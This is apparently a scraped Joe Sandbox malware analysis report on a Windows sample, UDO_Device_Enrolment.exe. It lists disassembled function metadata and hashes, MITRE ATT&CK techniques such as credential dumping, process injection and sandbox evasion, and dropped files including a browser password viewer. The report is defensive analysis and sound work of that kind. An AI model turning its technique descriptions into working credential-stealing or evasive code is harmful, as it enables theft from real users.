Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$freemalloc
String ID:
API String ID: 2605342592-0
Opcode ID: e4beb7e75d6b6867dc320311ec8e335ac11e6b54827e84fb66ef34ac5fc0bb4b
Instruction ID: ea87104fc79d75f86d2c504ed11776472b4b13713310e55314d530160130750a
Opcode Fuzzy Hash: e4beb7e75d6b6867dc320311ec8e335ac11e6b54827e84fb66ef34ac5fc0bb4b
Instruction Fuzzy Hash: C2F0376660521E7BD71025A55C40D77779CDB8A679B11073BFD10E21C1ED59DC0016B4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2DE Relevance: 5.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040A2E8
wcslen.MSVCRT ref: 0040A2F2
wcscpy.MSVCRT ref: 0040A306

Part of subcall function 00409CD8: wcslen.MSVCRT ref: 00409CD9
Part of subcall function 00409CD8: wcscat.MSVCRT ref: 00409CF1

wcscat.MSVCRT ref: 0040A314

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: wcslen$wcscat$wcscpy
String ID:
API String ID: 1961120804-0
Opcode ID: 0805737b1f039988677200671bcaaa36b03551ad30adce6ee1146d80a995da50
Instruction ID: 1861b29a0bf7327a5836ebdd28897080e635c1e607cd20ba3add047366222a10
Opcode Fuzzy Hash: 0805737b1f039988677200671bcaaa36b03551ad30adce6ee1146d80a995da50
Instruction Fuzzy Hash: 57E0E532505209BAEF017FA2D9068CE3B95EF06379B51483BFC0892041EB3DE561879A

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report UDO_Device_Enrolment.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UDO_Device_Enrolment.exe.log

C:\Users\user\AppData\Local\Temp\bhvFCA.tmp

C:\temp\Windows32\HWID.txt

C:\temp\Windows32\WebBrowserPassView.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

Windows Analysis Report
UDO_Device_Enrolment.exe

Function 0040BAE3 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212
filenativeCOMMON

Function 00415799 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142
processlibraryloaderCOMMON

Function 00406F91 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre